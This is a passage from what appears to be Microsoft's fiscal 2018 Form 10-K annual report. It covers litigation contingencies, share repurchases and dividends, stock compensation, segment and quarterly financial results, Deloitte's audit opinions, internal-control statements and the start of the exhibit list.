Microsoft Mobile Oy, a subsidiary of Microsoft, along with other handset manufacturers and network operators, is a defendant in 35 lawsuits filed in the Superior Court for the District of Columbia by individual plaintiffs who allege that radio emissions from cellular handsets caused their brain tumors and other adverse health effects. We assumed responsibility for these claims in our agreement to acquire Nokia's Devices and Services business and have been substituted for the Nokia defendants. Nine of these cases were filed in 2002 and are consolidated for certain pre-trial proceedings; the remaining cases are stayed. In a separate 2009 decision, the Court of Appeals for the District of Columbia held that adverse health effect claims arising from the use of cellular handsets that operate within the U.S. Federal Communications Commission radio frequency emission guidelines ("FCC Guidelines") are pre-empted by federal law. The plaintiffs allege that their handsets either operated outside the FCC Guidelines or were manufactured before the FCC Guidelines went into effect. The lawsuits also allege an industry-wide conspiracy to manipulate the science and testing around emission guidelines.

In 2013, the defendants in the consolidated cases moved to exclude the plaintiffs' expert evidence of general causation on the basis of flawed scientific methodologies. In 2014, the trial court granted in part and denied in part the defendants' motion to exclude the plaintiffs' general causation experts. The defendants filed an interlocutory appeal challenging the standard for evaluating expert scientific evidence, which the District of Columbia Court of Appeals heard *en banc*. In October 2016, the Court of Appeals issued its decision adopting the standard advocated by the defendants and remanding the cases to the trial court for further proceedings under that standard. The plaintiffs have filed supplemental expert evidence, portions of which the defendants have moved to strike.

*Canadian Cell Phone Class Action*

Microsoft Mobile Oy, along with other handset manufacturers and network operators, is a defendant in a 2013 class action lawsuit filed in the Supreme Court of British Columbia by a purported class of Canadians who have used cellular phones for at least 1,600 hours, including a subclass of users with brain tumors, alleging adverse health effects from cellular phone use. Microsoft was served with the complaint in June 2014 and has been substituted for the Nokia defendants. The litigation has been dormant for more than three years.

**Employment-Related Litigation**

*Moussouris v. Microsoft*

Current and former female Microsoft employees in certain engineering and information technology roles brought this class action in federal court in Seattle in 2015, alleging systemic gender discrimination in pay and promotions. The plaintiffs moved to certify the class in October 2017. Microsoft filed an opposition in January 2018, attaching an expert report showing no statistically significant disparity in pay and promotions between similarly situated men and women. In June 2018, the court denied the plaintiffs' motion for class certification. The plaintiffs have appealed to the U.S. Court of Appeals for the Ninth Circuit. In July, the court denied Microsoft's motion for summary judgment with respect to the named plaintiffs.

**Other Contingencies**

We also are subject to a variety of other claims and suits that arise from time to time in the ordinary course of our business. Although management currently believes that resolving claims against us, individually or in aggregate, will not have a material adverse impact in our consolidated financial statements, these matters are subject to inherent uncertainties and management's view of these matters may change in the future.

As of June 30, 2018, we accrued aggregate legal liabilities of $323 million. While we intend to defend these matters vigorously, adverse outcomes that we estimate could reach approximately $1.1 billion in aggregate beyond recorded amounts are reasonably possible. Were unfavorable final outcomes to occur, there exists the possibility of a material adverse impact in our consolidated financial statements for the period in which the effects become reasonably estimable.

**Indemnifications**

We provide indemnifications of varying scope and size to certain customers against claims of intellectual property infringement made by third parties arising from the use of our products and certain other matters. Additionally, we have

agreed to cover damages resulting from breaches of certain security and privacy commitments in our cloud business. In evaluating estimated losses on these obligations, we consider factors such as the degree of probability of an unfavorable outcome and our ability to make a reasonable estimate of the amount of loss. These obligations did not have a material impact in our consolidated financial statements during the periods presented.

## NOTE 18 — STOCKHOLDERS' EQUITY

### Shares Outstanding

Shares of common stock outstanding were as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Balance, beginning of year | 7,708 | 7,808 | 8,027 |
| Issued | 68 | 70 | 75 |
| Repurchased | (99) | (170) | (294) |
| Balance, end of year | 7,677 | 7,708 | 7,808 |

### Share Repurchases

On September 16, 2013, our Board of Directors approved a share repurchase program authorizing up to $40.0 billion in share repurchases. This share repurchase program became effective on October 1, 2013, and was completed on December 22, 2016.

On September 20, 2016, our Board of Directors approved a share repurchase program authorizing up to an additional $40.0 billion in share repurchases. This share repurchase program commenced on December 22, 2016 following completion of the prior program approved on September 16, 2013, has no expiration date, and may be suspended or discontinued at any time without notice. As of June 30, 2018, $28.2 billion remained of this $40.0 billion share repurchase program.

We repurchased the following shares of common stock under the share repurchase programs:

(In millions)

| Year Ended June 30, | Shares | Amount | Shares | Amount | Shares | Amount |
|---|---|---|---|---|---|---|
|  |  | 2018 |  | 2017 |  | 2016 |
| First Quarter | 22 | $ 1,600 | 63 | $ 3,550 | 89 | $ 4,000 |
| Second Quarter | 22 | 1,800 | 59 | 3,533 | 66 | 3,600 |
| Third Quarter | 34 | 3,100 | 25 | 1,600 | 69 | 3,600 |
| Fourth Quarter | 21 | 2,100 | 23 | 1,600 | 70 | 3,600 |
| Total | 99 | $ 8,600 | 170 | $ 10,283 | 294 | $ 14,800 |

Shares repurchased beginning in the third quarter of fiscal year 2017 were under the share repurchase program approved September 20, 2016. All other shares repurchased were under the share repurchase program approved September 16, 2013. The above table excludes shares repurchased to settle employee tax withholding related to the vesting of stock awards. All repurchases were made using cash resources.

## Dividends

Our Board of Directors declared the following dividends:

| Declaration Date | Dividend Per Share | Record Date | Amount | Payment Date |
|---|---|---|---|---|
| **Fiscal Year 2018** | | | (in millions) | |
| **September 19, 2017** | **$    0.42** | **November 16, 2017** | **$    3,238** | **December 14, 2017** |
| **November 29, 2017** | **0.42** | **February 15, 2018** | **3,232** | **March 8, 2018** |
| **March 12, 2018** | **0.42** | **May 17, 2018** | **3,226** | **June 14, 2018** |
| **June 13, 2018** | **0.42** | **August 16, 2018** | **3,224** | **September 13, 2018** |
| **Fiscal Year 2017** | | | | |
| September 20, 2016 | $    0.39 | November 17, 2016 | $    3,024 | December 8, 2016 |
| November 30, 2016 | 0.39 | February 16, 2017 | 3,012 | March 9, 2017 |
| March 14, 2017 | 0.39 | May 18, 2017 | 3,009 | June 8, 2017 |
| June 13, 2017 | 0.39 | August 17, 2017 | 3,003 | September 14, 2017 |

The dividend declared on June 13, 2018 was included in other current liabilities as of June 30, 2018.

### NOTE 19 — ACCUMULATED OTHER COMPREHENSIVE INCOME (LOSS)

The following table summarizes the changes in accumulated other comprehensive income (loss) by component:

(In millions)

| Year Ended June 30, | | 2018 | | 2017 | | 2016 |
|---|---|---|---|---|---|---|
| **Derivatives** | | | | | | |
| Balance, beginning of period | $ | **134** | $ | 352 | $ | 590 |
| Unrealized gains, net of tax of **$11**, $4, and $24 | | **218** | | 328 | | 351 |
| Reclassification adjustments for gains included in revenue | | **(185)** | | (555) | | (625) |
| Tax expense included in provision for income taxes | | **6** | | 9 | | 36 |
| Amounts reclassified from accumulated other comprehensive income | | **(179)** | | (546) | | (589) |
| Net change related to derivatives, net of tax of **$5**, $(5), and $(12) | | **39** | | (218) | | (238) |
| Balance, end of period | $ | **173** | $ | 134 | $ | 352 |
| **Investments** | | | | | | |
| Balance, beginning of period | $ | **1,825** | $ | 2,941 | $ | 3,169 |
| Unrealized gains (losses), net of tax of **$(427)**, $267, and $120 | | **(1,146)** | | 517 | | 219 |
| Reclassification adjustments for gains included in other income (expense), net | | **(2,309)** | | (2,513) | | (688) |
| Tax expense included in provision for income taxes | | **738** | | 880 | | 241 |
| Amounts reclassified from accumulated other comprehensive income | | **(1,571)** | | (1,633) | | (447) |
| Net change related to investments, net of tax of **$(1,165)**, $(613), and $(121) | | **(2,717)** | | (1,116) | | (228) |
| Balance, end of period | $ | **(892)** | $ | 1,825 | $ | 2,941 |
| **Translation Adjustments and Other** | | | | | | |
| Balance, beginning of period | $ | **(1,332)** | $ | (1,499) | $ | (1,237) |
| Translation adjustments and other, net of tax effects of **$0**, $9, and $(33) | | **(178)** | | 167 | | (262) |
| Balance, end of period | $ | **(1,510)** | $ | (1,332) | $ | (1,499) |
| Cumulative effect of accounting change | | **42** | | 0 | | 0 |
| Accumulated other comprehensive income (loss), end of period | $ | **(2,187)** | $ | 627 | $ | 1,794 |

## NOTE 20 — EMPLOYEE STOCK AND SAVINGS PLANS

We grant stock-based compensation to employees and directors. As of June 30, 2018, an aggregate of 381 million shares were authorized for future grant under our stock plans. In fiscal year 2018, our Board of Directors approved the 2017 Stock Plan, which authorized an additional 308 million shares for future grant under our stock plans. Awards that expire or are canceled without delivery of shares generally become available for issuance under the plans. We issue new shares of Microsoft common stock to satisfy vesting of awards granted under our stock plans. We also have an ESPP for all eligible employees.

Stock-based compensation expense and related income tax benefits were as follows:

**(In millions)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Stock-based compensation expense | $ 3,940 | $ 3,266 | $ 2,668 |
| Income tax benefits related to stock-based compensation | 823 | 1,066 | 882 |

### Stock Plans

Stock awards entitle the holder to receive shares of Microsoft common stock as the award vests. Stock awards generally vest over a four or five-year service period.

#### *Executive Incentive Plan*

Under the Executive Incentive Plan, the Compensation Committee approves stock awards to executive officers and certain senior executives. RSUs generally vest ratably over a four-year service period. PSUs generally vest over a three-year performance period. The number of shares the PSU holder receives is based on the extent to which the corresponding performance goals have been achieved.

#### *Activity for All Stock Plans*

The fair value of stock awards was estimated on the date of grant using the following assumptions:

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Dividends per share (quarterly amounts) | $0.39 - $0.42 | $0.36 - $0.39 | $0.31 - $0.36 |
| Interest rates | 1.7% - 2.9% | 1.2% - 2.2% | 1.1% - 1.8% |

During fiscal year 2018, the following activity occurred under our stock plans:

| | Shares | Weighted Average Grant-Date Fair Value |
|---|---|---|
| | **(In millions)** | |
| **Stock Awards** | | |
| Nonvested balance, beginning of year | 201 | $ 46.32 |
| Granted [a] | 70 | 75.88 |
| Vested | (80) | 45.74 |
| Forfeited | (17) | 53.41 |
| Nonvested balance, end of year | 174 | 57.85 |

(a)   *Includes 3 million, 2 million, and 1 million of PSUs granted at target and performance adjustments above target levels for fiscal years 2018, 2017, and 2016, respectively.*

As of June 30, 2018, there was approximately $7.0 billion of total unrecognized compensation costs related to stock awards. These costs are expected to be recognized over a weighted average period of 3 years. The weighted average grant-date fair value of stock awards granted was $75.88, $55.64, and $41.51 for fiscal years 2018, 2017, and 2016,

respectively. The fair value of stock awards vested was $6.6 billion, $4.8 billion, and $3.9 billion, for fiscal years 2018, 2017, and 2016, respectively.

## Employee Stock Purchase Plan

We have an ESPP for all eligible employees. Shares of our common stock may be purchased by employees at three-month intervals at 90% of the fair market value on the last trading day of each three-month period. Employees may purchase shares having a value not exceeding 15% of their gross compensation during an offering period. Employees purchased the following shares during the periods presented:

**(Shares in millions)**

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Shares purchased | **13** | 13 | 15 |
| Average price per share | **$ 76.40** | $ 56.36 | $ 44.83 |

As of June 30, 2018, 116 million shares of our common stock were reserved for future issuance through the ESPP.

## Savings Plan

We have a savings plan in the U.S. that qualifies under Section 401(k) of the Internal Revenue Code, and a number of savings plans in international locations. Participating U.S. employees may contribute a portion of their salary, subject to certain limitations. We contribute fifty cents for each dollar a participant contributes in this plan, with a maximum employer contribution of 50% of the IRS contribution limit for the calendar year. Matching contributions for all plans were $807 million, $734 million, and $549 million in fiscal years 2018, 2017, and 2016, respectively, and were expensed as contributed.

## NOTE 21 — SEGMENT INFORMATION AND GEOGRAPHIC DATA

In its operation of the business, management, including our chief operating decision maker, who is also our Chief Executive Officer, reviews certain financial information, including segmented internal profit and loss statements prepared on a basis not consistent with GAAP. During the periods presented, we reported our financial performance based on the following segments: Productivity and Business Processes, Intelligent Cloud, and More Personal Computing.

Our reportable segments are described below.

## Productivity and Business Processes

Our Productivity and Business Processes segment consists of products and services in our portfolio of productivity, communication, and information services, spanning a variety of devices and platforms. This segment primarily comprises:

- Office Commercial, including Office 365 subscriptions and Office licensed on-premises, comprising Office, Exchange, SharePoint, Skype for Business, and Microsoft Teams, and related Client Access Licenses ("CALs").
- Office Consumer, including Office 365 subscriptions and Office licensed on-premises, and Office Consumer Services, including Skype, Outlook.com, and OneDrive.
- LinkedIn, including Talent Solutions, Marketing Solutions, and Premium Subscriptions.

- Dynamics business solutions, including Dynamics ERP on-premises, Dynamics CRM on-premises, and Dynamics 365, a set of cloud-based applications across ERP and CRM.

## Intelligent Cloud

Our Intelligent Cloud segment consists of our public, private, and hybrid server products and cloud services that can power modern business. This segment primarily comprises:

- Server products and cloud services, including Microsoft SQL Server, Windows Server, Visual Studio, System Center, and related CALs, and Azure.
- Enterprise Services, including Premier Support Services and Microsoft Consulting Services.

## More Personal Computing

Our More Personal Computing segment consists of products and services geared towards harmonizing the interests of end users, developers, and IT professionals across all devices. This segment primarily comprises:

- Windows, including Windows OEM licensing and other non-volume licensing of the Windows operating system; Windows Commercial, comprising volume licensing of the Windows operating system, Windows cloud services, and other Windows commercial offerings; patent licensing; Windows Internet of Things ("IoT"); and MSN advertising.
- Devices, including Microsoft Surface, PC accessories, and other intelligent devices.
- Gaming, including Xbox hardware and Xbox software and services, comprising Xbox Live transactions, subscriptions, and advertising ("Xbox Live"), video games, and third-party video game royalties.
- Search.

Revenue and costs are generally directly attributed to our segments. However, due to the integrated structure of our business, certain costs incurred related and costs incurred by one segment may benefit other segments. Revenue from certain contracts is allocated among the segments based on the relative value of the underlying products and services, which can include allocation based on actual prices charged, prices when sold separately, or estimated costs plus a profit margin. Cost of revenue is allocated in certain cases based on a relative revenue methodology. Operating expenses that are allocated primarily include those relating to marketing of products and services from which multiple segments benefit and are generally allocated based on relative gross margin.

In addition, certain costs incurred at a corporate level that are identifiable and that benefit our segments are allocated to them. These allocated costs include costs of: legal, including settlements and fines; information technology; human resources; finance; excise taxes; field selling; shared facilities services; and customer service and support. Each allocation is measured differently based on the specific facts and circumstances of the costs being allocated. Certain corporate-level activity is not allocated to our segments, including impairment and restructuring expenses.

Segment revenue and operating income were as follows during the periods presented:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| **Revenue** | | | |
| Productivity and Business Processes | $ **35,865** | $ 29,870 | $ 25,792 |
| Intelligent Cloud | **32,219** | 27,407 | 24,952 |
| More Personal Computing | **42,276** | 39,294 | 40,410 |
| Total | $ **110,360** | $ 96,571 | $ 91,154 |
| **Operating Income (Loss)** | | | |
| Productivity and Business Processes | $ **12,924** | $ 11,389 | $ 11,756 |
| Intelligent Cloud | **11,524** | 9,127 | 9,249 |
| More Personal Computing | **10,610** | 8,815 | 6,183 |
| Corporate and Other | **0** | (306) | (1,110) |
| Total | $ **35,058** | $ 29,025 | $ 26,078 |

Corporate and Other operating loss comprised impairment and restructuring expenses.

No sales to an individual customer or country other than the United States accounted for more than 10% of revenue for the fiscal years 2018, 2017, or 2016. Revenue, classified by the major geographic areas in which our customers are located, was as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| United States [a] | $ 55,926 | $ 51,078 | $ 46,416 |
| Other countries | 54,434 | 45,493 | 44,738 |
| Total | $110,360 | $ 96,571 | $ 91,154 |

(a)  *Includes billings to OEMs and certain multinational organizations because of the nature of these businesses and the impracticability of determining the geographic source of the revenue.*

Revenue from external customers, classified by significant product and service offerings, was as follows:

(In millions)

| Year Ended June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| Office products and cloud services | $ 28,316 | $ 25,573 | $ 23,868 |
| Server products and cloud services | 26,129 | 21,649 | 19,062 |
| Windows | 19,518 | 18,593 | 17,548 |
| Gaming | 10,353 | 9,051 | 9,202 |
| Search advertising | 7,012 | 6,219 | 5,428 |
| Enterprise Services | 5,846 | 5,542 | 5,659 |
| Devices | 5,134 | 5,062 | 7,888 |
| LinkedIn | 5,259 | 2,271 | 0 |
| Other | 2,793 | 2,611 | 2,499 |
| Total | $110,360 | $ 96,571 | $ 91,154 |

Our commercial cloud revenue, which primarily comprises Office 365 commercial, Azure, Dynamics 365, and other cloud properties, was $23.2 billion, $14.9 billion, and $9.5 billion in fiscal years 2018, 2017, and 2016, respectively. These amounts are primarily included in Office products and services and server products and cloud services in the table above.

Assets are not allocated to segments for internal reporting presentations. A portion of amortization and depreciation is included with various other costs in an overhead allocation to each segment; it is impracticable for us to separately identify the amount of amortization and depreciation by segment that is included in the measure of segment profit or loss.

Long-lived assets, excluding financial instruments and tax assets, classified by the location of the controlling statutory company and with countries over 10% of the total shown separately, were as follows:

(In millions)

| June 30, | 2018 | 2017 | 2016 |
|---|---|---|---|
| United States | $ 44,501 | $ 42,730 | $ 25,145 |
| Ireland | 12,843 | 12,889 | 2,099 |
| Luxembourg | 6,856 | 6,854 | 6,868 |
| Other countries | 15,682 | 13,044 | 11,047 |
| Total | $ 79,882 | $ 75,517 | $ 45,159 |

PART II
Item 8

## NOTE 22 — QUARTERLY INFORMATION (UNAUDITED)

(In millions, except per share amounts)

| Quarter Ended | September 30 | December 31 | March 31 | June 30 | Total |
|---|---|---|---|---|---|
| **Fiscal Year 2018** | | | | | |
| Revenue | $ 24,538 | $ 28,918 | $ 26,819 | $ 30,085 | $ 110,360 |
| Gross margin | 16,260 | 17,854 | 17,550 | 20,343 | 72,007 |
| Operating income | 7,708 | 8,679 | 8,292 | 10,379 | 35,058 |
| Net income (loss) [a] | 6,576 | (6,302) | 7,424 | 8,873 | 16,571 |
| Basic earnings (loss) per share | 0.85 | (0.82) | 0.96 | 1.15 | 2.15 |
| Diluted earnings (loss) per share [b] | 0.84 | (0.82) | 0.95 | 1.14 | 2.13 |
| | | | | | |
| **Fiscal Year 2017** [c] | | | | | |
| Revenue | $ 21,928 | $ 25,826 | $ 23,212 | $ 25,605 | $ 96,571 |
| Gross margin | 14,084 | 15,925 | 15,152 | 17,149 | 62,310 |
| Operating income | 6,715 | 7,905 | 6,723 | 7,682[d] | 29,025[d] |
| Net income | 5,667 | 6,267 | 5,486 | 8,069[d] | 25,489[d] |
| Basic earnings per share | 0.73 | 0.81 | 0.71 | 1.05 | 3.29 |
| Diluted earnings per share | 0.72 | 0.80 | 0.70 | 1.03[d] | 3.25[d] |

(a) *Reflects the net charge (benefit) related to the TCJA of $13.8 billion for the second quarter, $(104) million for the fourth quarter, and $13.7 billion for fiscal year 2018.*

(b) *Reflects the net charge (benefit) related to the TCJA, which decreased (increased) diluted EPS $1.78 for the second quarter, $(0.01) for the fourth quarter, and $1.75 for fiscal year 2018.*

(c) *On December 8, 2016, we acquired LinkedIn Corporation. LinkedIn has been included in our consolidated results of operations starting on the acquisition date.*

(d) *Includes $306 million of employee severance expenses primarily related to our sales and marketing restructuring plan, which decreased operating income, net income, and diluted EPS by $306 million, $243 million, and $0.04, respectively.*

**REPORT OF INDEPENDENT REGISTERED PUBLIC ACCOUNTING FIRM**

To the Stockholders and the Board of Directors of Microsoft Corporation

**Opinion on the Financial Statements**

We have audited the accompanying consolidated balance sheets of Microsoft Corporation and subsidiaries (the "Company") as of June 30, 2018 and 2017, the related consolidated statements of income, comprehensive income, stockholders' equity, and cash flows, for each of the three years in the period ended June 30, 2018, and the related notes (collectively referred to as the "financial statements"). In our opinion, the financial statements present fairly, in all material respects, the financial position of the Company as of June 30, 2018 and 2017, and the results of its operations and its cash flows for each of the three years in the period ended June 30, 2018, in conformity with accounting principles generally accepted in the United States of America.

We have also audited, in accordance with the standards of the Public Company Accounting Oversight Board (United States) ("PCAOB"), the Company's internal control over financial reporting as of June 30, 2018, based on criteria established in *Internal Control — Integrated Framework (2013)* issued by the Committee of Sponsoring Organizations of the Treadway Commission and our report dated August 3, 2018, expressed an unqualified opinion on the Company's internal control over financial reporting.

**Change in Accounting Principles**

As discussed in Note 1 to the financial statements, the Company has changed its method of accounting for revenue from contracts with customers and for accounting for leases in fiscal year 2018 due to the adoption of the new revenue standard and new lease standard, respectively. The Company adopted the new revenue standard using the full retrospective approach and adopted the new lease standard using a modified retrospective approach.

**Basis for Opinion**

These financial statements are the responsibility of the Company's management. Our responsibility is to express an opinion on the Company's financial statements based on our audits. We are a public accounting firm registered with the PCAOB and are required to be independent with respect to the Company in accordance with the U.S. federal securities laws and the applicable rules and regulations of the Securities and Exchange Commission and the PCAOB.

We conducted our audits in accordance with the standards of the PCAOB. Those standards require that we plan and perform the audit to obtain reasonable assurance about whether the financial statements are free of material misstatement, whether due to error or fraud. Our audits included performing procedures to assess the risks of material misstatement of the financial statements, whether due to error or fraud, and performing procedures that respond to those risks. Such procedures included examining, on a test basis, evidence regarding the amounts and disclosures in the financial statements. Our audits also included evaluating the accounting principles used and significant estimates made by management, as well as evaluating the overall presentation of the financial statements. We believe that our audits provide a reasonable basis for our opinion.

/s/   DELOITTE & TOUCHE LLP

Seattle, Washington
August 3, 2018

We have served as the Company's auditor since 1983.

# ITEM 9. CHANGES IN AND DISAGREEMENTS WITH ACCOUNTANTS ON ACCOUNTING AND FINANCIAL DISCLOSURE

Not applicable.

# ITEM 9A. CONTROLS AND PROCEDURES

Under the supervision and with the participation of our management, including the Chief Executive Officer and Chief Financial Officer, we have evaluated the effectiveness of our disclosure controls and procedures as required by Exchange Act Rule 13a-15(b) as of the end of the period covered by this report. Based on that evaluation, the Chief Executive Officer and Chief Financial Officer have concluded that these disclosure controls and procedures are effective.

## REPORT OF MANAGEMENT ON INTERNAL CONTROL OVER FINANCIAL REPORTING

Our management is responsible for establishing and maintaining adequate internal control over financial reporting for the company. Internal control over financial reporting is a process to provide reasonable assurance regarding the reliability of our financial reporting for external purposes in accordance with accounting principles generally accepted in the United States of America. Internal control over financial reporting includes maintaining records that in reasonable detail accurately and fairly reflect our transactions; providing reasonable assurance that transactions are recorded as necessary for preparation of our financial statements; providing reasonable assurance that receipts and expenditures of company assets are made in accordance with management authorization; and providing reasonable assurance that unauthorized acquisition, use, or disposition of company assets that could have a material effect on our financial statements would be prevented or detected on a timely basis. Because of its inherent limitations, internal control over financial reporting is not intended to provide absolute assurance that a misstatement of our financial statements would be prevented or detected.

Management conducted an evaluation of the effectiveness of our internal control over financial reporting based on the framework in *Internal Control – Integrated Framework (2013)* issued by the Committee of Sponsoring Organizations of the Treadway Commission. Based on this evaluation, management concluded that the company's internal control over financial reporting was effective as of June 30, 2018. Deloitte & Touche LLP has audited our internal control over financial reporting as of June 30, 2018; their report is included in Item 9A.

There were no changes in our internal control over financial reporting during the quarter ended June 30, 2018 that have materially affected, or are reasonably likely to materially affect, our internal control over financial reporting. We implemented internal controls to ensure we adequately evaluated our contracts and properly assessed the impact of the new accounting standards related to revenue recognition and leases on our financial statements to facilitate their adoption on July 1, 2017. There were no significant changes to our internal control over financial reporting due to the adoption of the new standards.

# REPORT OF INDEPENDENT REGISTERED PUBLIC ACCOUNTING FIRM

To the Stockholders and the Board of Directors of Microsoft Corporation

## Opinion on Internal Control over Financial Reporting

We have audited the internal control over financial reporting of Microsoft Corporation and subsidiaries (the "Company") as of June 30, 2018, based on criteria established in *Internal Control — Integrated Framework (2013)* issued by the Committee of Sponsoring Organizations of the Treadway Commission (COSO). In our opinion, the Company maintained, in all material respects, effective internal control over financial reporting as of June 30, 2018, based on the criteria established in *Internal Control — Integrated Framework (2013)* issued by COSO.

We have also audited, in accordance with the standards of the Public Company Accounting Oversight Board (United States) (PCAOB), the consolidated financial statements and the related notes (collectively referred to as the "financial statements") as of and for the year ended June 30, 2018, of the Company and our report dated August 3, 2018, expressed an unqualified opinion on those financial statements and included an explanatory paragraph related to the Company's change in method of accounting for revenue from contracts with customers and for accounting for leases in fiscal year 2018 due to the adoption of the new revenue standard and new lease standard, respectively.

## Basis for Opinion

The Company's management is responsible for maintaining effective internal control over financial reporting and for its assessment of the effectiveness of internal control over financial reporting, included in the accompanying Report of Management on Internal Control over Financial Reporting. Our responsibility is to express an opinion on the Company's internal control over financial reporting based on our audit. We are a public accounting firm registered with the PCAOB and are required to be independent with respect to the Company in accordance with the U.S. federal securities laws and the applicable rules and regulations of the Securities and Exchange Commission and the PCAOB.

We conducted our audit in accordance with the standards of the PCAOB. Those standards require that we plan and perform the audit to obtain reasonable assurance about whether effective internal control over financial reporting was maintained in all material respects. Our audit included obtaining an understanding of internal control over financial reporting, assessing the risk that a material weakness exists, testing and evaluating the design and operating effectiveness of internal control based on the assessed risk, and performing such other procedures as we considered necessary in the circumstances. We believe that our audit provides a reasonable basis for our opinion.

## Definition and Limitations of Internal Control over Financial Reporting

A company's internal control over financial reporting is a process designed to provide reasonable assurance regarding the reliability of financial reporting and the preparation of financial statements for external purposes in accordance with generally accepted accounting principles. A company's internal control over financial reporting includes those policies and procedures that (1) pertain to the maintenance of records that, in reasonable detail, accurately and fairly reflect the transactions and dispositions of the assets of the company; (2) provide reasonable assurance that transactions are recorded as necessary to permit preparation of financial statements in accordance with generally accepted accounting principles, and that receipts and expenditures of the company are being made only in accordance with authorizations of management and directors of the company; and (3) provide reasonable assurance regarding prevention or timely detection of unauthorized acquisition, use, or disposition of the company's assets that could have a material effect on the financial statements.

Because of its inherent limitations, internal control over financial reporting may not prevent or detect misstatements. Also, projections of any evaluation of effectiveness to future periods are subject to the risk that controls may become inadequate because of changes in conditions, or that the degree of compliance with the policies or procedures may deteriorate.

/s/   DELOITTE & TOUCHE LLP

Seattle, Washington
August 3, 2018

# ITEM 9B. OTHER INFORMATION

During the quarter ended December 31, 2017, Microsoft provided software services to a person or entity identified under section 560.304 of title 31, Code of Federal Regulations. The services constituted a cloud-based spam and malware filtering service and the cloud-based provision of Office 365 software services provided to two entities associated with the Iranian bank, Bank Sepah – Bank Sepah International PLC and Banque Sepah, respectively. For the former, an annual service fee equivalent to $600 was charged for a one-year period beginning in February 2017, and for the latter, use rights were charged at a price equivalent to approximately $55 per month from September 2016 through November 2017, totaling $770. It is not possible to determine the precise profits, if any, attributable to these activities, though they are less than the associated revenues. Microsoft has ceased providing these software services to these entities and has no intention of doing so in the future.

## PART III

# ITEM 10. DIRECTORS, EXECUTIVE OFFICERS AND CORPORATE GOVERNANCE

A list of our executive officers and biographical information appears in Part I, Item 1 of this Form 10-K. Information about our directors may be found under the caption "Our director nominees" in our Proxy Statement for the Annual Meeting of Shareholders to be held November 28, 2018 (the "Proxy Statement"). Information about our Audit Committee may be found under the caption "Board committees" in the Proxy Statement. That information is incorporated herein by reference.

The information in the Proxy Statement set forth under the caption "Section 16(a) beneficial ownership reporting compliance" is incorporated herein by reference.

We have adopted the Microsoft Finance Code of Professional Conduct (the "finance code of ethics"), a code of ethics that applies to our Chief Executive Officer, Chief Financial Officer, Chief Accounting Officer, and other finance organization employees. The finance code of ethics is publicly available on our website at https://aka.ms/FinanceCodeProfessionalConduct. If we make any substantive amendments to the finance code of ethics or grant any waiver, including any implicit waiver, from a provision of the code to our Chief Executive Officer, Chief Financial Officer, or Chief Accounting Officer, we will disclose the nature of the amendment or waiver on that website or in a report on Form 8-K.

# ITEM 11. EXECUTIVE COMPENSATION

The information in the Proxy Statement set forth under the captions "Director compensation," "Named executive officer compensation," "Compensation Committee interlocks and insider participation," and "Compensation Committee report" is incorporated herein by reference.

# ITEM 12. SECURITY OWNERSHIP OF CERTAIN BENEFICIAL OWNERS AND MANAGEMENT AND RELATED STOCKHOLDER MATTERS

The information in the Proxy Statement set forth under the captions "Stock ownership information," "Principal shareholders" and "Equity compensation plan information" is incorporated herein by reference.

# ITEM 13. CERTAIN RELATIONSHIPS AND RELATED TRANSACTIONS, AND DIRECTOR INDEPENDENCE

The information set forth in the Proxy Statement under the captions "Director independence" and "Certain relationships and related transactions" is incorporated herein by reference.

# ITEM 14. PRINCIPAL ACCOUNTING FEES AND SERVICES

Information concerning principal accountant fees and services appears in the Proxy Statement under the headings "Fees billed by Deloitte & Touche" and "Policy on Audit Committee pre-approval of audit and permissible non-audit services of independent auditor" and is incorporated herein by reference.

# PART IV

# ITEM 15. EXHIBITS, FINANCIAL STATEMENT SCHEDULES

**(a)    Financial Statements and Schedules**

The financial statements are set forth under Item 8 of this Form 10-K, as indexed below. Financial statement schedules have been omitted since they either are not required, not applicable, or the information is otherwise included.

| Index to Financial Statements | Page |
| --- | --- |
| Income Statements | 50 |
| Comprehensive Income Statements | 51 |
| Balance Sheets | 52 |
| Cash Flows Statements | 53 |
| Stockholders' Equity Statements | 54 |
| Notes to Financial Statements | 55 |
| Report of Independent Registered Public Accounting Firm | 96 |

**(b)    Exhibit Listing**

| Exhibit Number | Exhibit Description | Filed Herewith | Incorporated by Reference | | | |
| --- | --- | --- | --- | --- | --- | --- |
| | | | Form | Period Ending | Exhibit | Filing Date |
| 3.1 | Amended and Restated Articles of Incorporation of Microsoft Corporation | | 8-K | | 3.1 | 12/1/16 |
| 3.2 | Bylaws of Microsoft Corporation | | 8-K | | 3.2 | 6/14/17 |
| 4.1 | Form of Indenture between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee ("Base Indenture") | | S-3ASR | | 4.1 | 11/20/08 |
| 4.2 | Form of First Supplemental Indenture for 2.95% Notes due 2014, 4.20% Notes due 2019, and 5.20% Notes due 2039, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Base Indenture | | 8-K | | 4.2 | 5/15/09 |
| 4.5 | Form of Second Supplemental Indenture for 0.875% Notes due 2013, 1.625% Notes due 2015, 3.00% Notes due 2020, and 4.50% Notes due 2040, dated as of September 27, 2010, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.2 | 9/27/10 |

| Exhibit Number | Exhibit Description | Filed Herewith | Incorporated by Reference | | | |
|---|---|---|---|---|---|---|
| | | | Form | Period Ending | Exhibit | Filing Date |
| 4.6 | Third Supplemental Indenture for 2.500% Notes due 2016, 4.000% Notes due 2021, and 5.300% Notes due 2041, dated as of February 8, 2011, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee, to the Indenture, dated as of May 18, 2009, between Microsoft Corporation and The Bank of New York Mellon Trust Company, N.A., as Trustee | | 8-K | | 4.2 | 2/8/11 |
